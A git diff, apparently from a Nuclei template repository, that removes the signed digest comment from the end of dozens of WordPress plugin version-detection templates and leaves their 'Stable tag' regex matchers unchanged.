687dc0f7d8..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e29cdb1b2b3952ee6c6a18ed32f9b0feb08b419c25a6143fd255ee1333d7df87022100b5432fd377f1a722e2cf3cacd4b789d0de862aec68533e20aaeb570da5cba4c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 963e220f37..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fe6f4de12dc15815eec580d7a65cd87b7990095fb4fbd8818132cb87143f1806022100a6ad78ad0ad49c70b99474ef8d3d1d48be6f5221551ea323c9f1fdbdd24766b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index c530dddcf0..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b684f113fadea32a543adb90580fe22004bfdc10e6352ddb4a7468d979f66a6b0221008da53546a35d3e4c89794c3425a96e31445ce0276da425c3c49b069f4b0039a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index fbfb9496eb..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100975fa8a649ab51c444f80d4e784dfedb7dc51dcf37363800f66524ce1160136f022100dbafc0b55f9188ffe6e23c0f6c903949d96b0979fa7024d4a160de0887d8eee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 02543398be..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c2acac215029c1b7a729981eedef7d1ab69030b3b6d277372de6a416f97feb1f02206297711bbc1e8e3e94e81d74bd014beda8f50371dae497e28b4014ac90ed6072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index db4ecf9b15..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ebbb7a02cd902a9d2c4907e59e53dd90a102c2f27f07d2e00578e7401ea7305302202df40ffdc61418da631a530352fe068d1c878871e38c965b87820f584727f8f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 1e4f375bc9..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207a34f6888a9c9d7818f138ff633bce10821cdbd3c6d492935688547e79f2153f02202a03981a9f7b530beaacdc2ab97ef65541f6bb9e524c56724a75ce6d52e49648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index fff958cf4c..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220590a5d86fc8af24f788208b63c7088737c0ff09a7589d6f6238a494f20828c6602205c7d90b0d24f8f18da4c29278a27728709be8b5e171af6f28f6d7f4d8583f22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 8747a739bf..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210087a3f84e684f9ddb79c028bcb8a5e972a158fa3b8e116fc418a9e7d58a4d465d022100bbc3d87933b4d444bde940b7c0d4503ed9942a41d30a5a3489454723b5c3fc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 7cc93f7d54..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e4e704ce8fe1e6f8d6d1d27d91dbabca386ec94de19a84fec70d94ecbfe1437a022019a4ee4f53ba3f726a259829e28c7c98329c948ec35bf967e6b59b32628d3c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index b3e1e5221b..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c979c179353f7d681793cace1d422f163c86a3d1f27252f11711023afa330ef0022100f542f93c8651498a66a073e5bcb1f8ce3231394ef2761ff8cb161d5742f3cebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 0b4ef1dcbc..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e47628865d15edc39810907dcc00f07e35c3206c9dd110eb3e212da3ca4dde2e022100a15846875f49436eb32cfed1013b21e4ae78056dd6bac432988fe80104aa49d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 691a45418c..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440221008d0b6179923d7d3c1d9fcb7de68182edd407f298245ca94b8ea3163ae40d4ad9021f4176a5cc78408250c0d1a26982e444ecc0b2fb00410c98c443fb6e16956fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 4950c2445d..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200b21f26b3d0a95963f394c21472e7aafecad5be0159226909305fbcba6caa06a0220663525bb04ccd5a2a1b29e628f883538de2759a80bc63e45f567e23eb8a6fb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 1194d14c8e..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a64deebfe544d86a2cb793161627891783e0cdc4569a8fadc72b338e6f90486c022100efa8ecea22f23b88b6ee93d9814b1a3e975226f5b818177435fda613b46037fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 74be073f54..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100824a66f1e6b3813983925a00276a0ec78d80a3ac412fca9e31ec9b521dcad92202201e3d1cf278320305175113f4edf45f4e109d48e742ace3897675fb2bab56ce4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index e367140573..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204a5dbabf1ba87327e144f392a545236d1c6b4c0e8664d0bd417e2d818c5038fd022050199c0b7552176c1cf2771327ba2b7dbc32ec8237403636bb7c4af269c5d3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 47f931a9da..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009f2bfc174eef781f001bb2966c41144d0136ff1c5f72b0d82b0cd7f46269f31702203a10b8b9fc0fd582bb135286a87c4bb5f299134af325463f74680e50a7ffdb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 24ebc94f60..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220723def0c80447058718fac538e6d3cd351e63b064e69249969ac2868c1d9ebc302204d41bab8bc475baa52b5fd0459717ed0630048337047e5136772105f6fb48e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index aa6e68d565..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220639bb465398364c32e7d1f40ff0427ad7975b546f447d83e568d328abcd436d202203b70cc82ae8ebbf72a08cfe6a760952df68e2565b2a8a0ee305e9ab84f0884fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 7927be133c..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220695c74a6542d38b1e29e7dc27245f5e0e79413251390824b34dd086859c408a2022100cd2880d25a9202829b4a9e16a77bef57ca6a0f0e4dcd4ee50053a0f11fab2375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 6e6d0dd888..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220542394b1f227d51f4937647e743cd2a3683eac7cf03ce51a906e88a140838757022100af2871469abd33b22585c98412273b973c4d2335e7862646cca4e3ce02285197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 47e9b15f2c..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d382cef0ad915e62946ae8c26127fee6830d542a4a6ad527a503d1bf04298ef8022043b2399e924d6099bef9f88cbac8d332e977c7312d5ff46190f42f93377bdd54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 8b5f00ade9..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b02e9956a21f6c6cc7614f6c86e32fa6ea51c7ca364289a4daa86763b84c7726022077e1a8a0f88b29f34385bdc5f5f28a4541ac52690331f17947743290ce13c351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 019fe5d7f1..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100904b87e9f03e8c638b4f97f84664689b8ed21598e77965754aef38d8c8ec0c750221008418688d838a1dc9615a7e3ba719e04b3e06fb326c8b7ec4d82dd3874385a55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index a690491dcc..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022063065bca8784cf38c783b7235286da55f1f159956ce48e36395f5b65bb71f3020220347f0f981e22efa907c888829d0e4a359741cd9231c985bbbe7db9dd27a6c0e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 8726cd68d0..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e7009579ac803485a515bf3179c57d7757a1b2a6d19521a71eba503948f0ca81022100b9ffc802016e38576ad009dc00bd7b3eda9201a453d019388ac4ab146399de77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 1a733d2415..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220155fa038d7a041696a643c79a305a401a1421495b0875c6afbbcc1b0d9ee781a0221008f21d9b6f3a277583d475c1f93f2364b485af56bc8b3b2b3b5848c0d867c808e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 906b84bdad..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022053bafcbd13248331a35254774274c0e845f7f7c7329230bc87ce475916a3d5e202204814999c930b85b1c68610861fc77ea8be98286d4cbcb412196218a163f5b09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e878306bf3..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202ed3908eaba933693118393639146b56f3e1855493eb29f45c47f12b880d178b0220297122159e210528c75e9aa838b1626ea9b8ddd873d1864f731a0f6c28797393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a2a5a1618d..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f1c9aec42c673c730f98da0207969896f1f697ede9408fb014d7e854278b406c022100b23517959d567f52aa6b63c639badea8ab46b40a1fe86c9e0a2ce1984ba61afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 7267512449..01a3669132 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022023739bfb52a290fbadb52d5c1ed84054055569fc56381fb33d7c0e8a3fcaa93b022100f90bb091dbb747735428cdeedf41ac7344b663264e74c1903cdf5a14e03195b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index dce1b1f9ab..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206823a69e8ae759316af11f7b7d8f828a95e3b2664cc571c45531e7437e8620940220603ed6a23789957dcf965912d97e87baf63e0b82dea8959ed44e44d00747bac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index aa07968b97..dc18db23b1 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c6a46aaca9075965be3b5de5e2d181066d0dbf4fa1824f48d7a093148d3887b7022100fee3f3cc1b29236b28c91b2b66a598660b607e33c1ec6a9738211faf1ee94065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 8ec4f87b57..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204f920da9e4cb4eacee68afac5e5f97c8f34eb14ed92ded482a14402a50ef9a8f022100b7e50cfe5e6d05d2d89c97641f84e059349d406ebdd168a547e91dd6b2e5bff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index e9dd85de73..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022079cb0300a5ffa7a9f4f753ea62aba7f190f58dc58ed35b752bb16bfdbf2aa83202201206901d7f2dbe018ef5ead97f56a5ddc12849487734f6d8f56d0b9b077bdaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 1011748948..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201be2116f08506039227b5dab3e17e83a00396317d63645446d4bc905c857065802205b0d95a3e6587afef6cee00e3ddb70d7419f1c1d3454ef386e90113c77d07c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 56d51079e1..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206a84f5e66a1af603a3db09bfb528e3cf07711a4d0f4d3783aeb9d733d022a494022008231e9f643353df85a9b7910c0d2fa626ebec7fc9b383db6d246e8f0c8eb2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index b993d02a16..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009206a7c16e6c086919bc0905401fc80407470ab08c79c02914bad0d6cf6dfc1a022100b1bb3630930cf02a79f7fcb10f6c72119268c78a1869ea9b3cf4a9b732f67e96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 55cdd5aa15..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ec0fe720acfefd3623d35ac30c5bb40585c43beece2705c2010113f46acfe653022100f73df520b953f4606ccea7402098b5cd1143a04dcdafdcc187d67d53e2177d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c4cbd9efcc..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204a8f5ca1fbe964b39b426afb55e3245cc9852f9d0a14b2e4171f471f48f2e87f022100c5fbc25d89c40d691fad970416083074de504d85b83a4b960b77e533ed5f3077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index de8b4b1f03..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201035fa34a2174ba57146b1310f9c5f78836feb065deb8911eae4f2a9f47923e102206c0e899fb76c758084b19be984458a256bfd3be88c71a39c3570d6b413f59793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e899d300df..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009ebc749be4ef2835f6e79af7a6dede008d4e0230b0640773f3b07377e7cb064202207015e1158fa01b50c6a13a08c7b58f694bad03b7c16021d612ab65b7f21d48df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index bd231a2ab8..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220752bdeb9add0ce6095b7ec69ef8c71360470ecbb9993543b0bbc600451e69fed022100e0bda54df1d54d31c57ccf5cb37a0b42d4decec7fd94fa2054d1b169c0c70c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 8faf6bb2f3..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100924a7e4bf80c9cd12111a61342c06ed2687d8a17e20d3991c92fc5a6f7eb23a7022100b1f8a4904b37603f532dc335695f8774549df9818e3ec9daa3f730bf6ebaef8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index c9e2e4202f..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b5afc97ecff89d117a5707bf0318b47ed8e793b8cfab6409128e0f10708dc795022100eac2f97d52808de678b9e01589f31c1e6f00784da6b7a212be127b7062be557a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index cd096c3b78..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 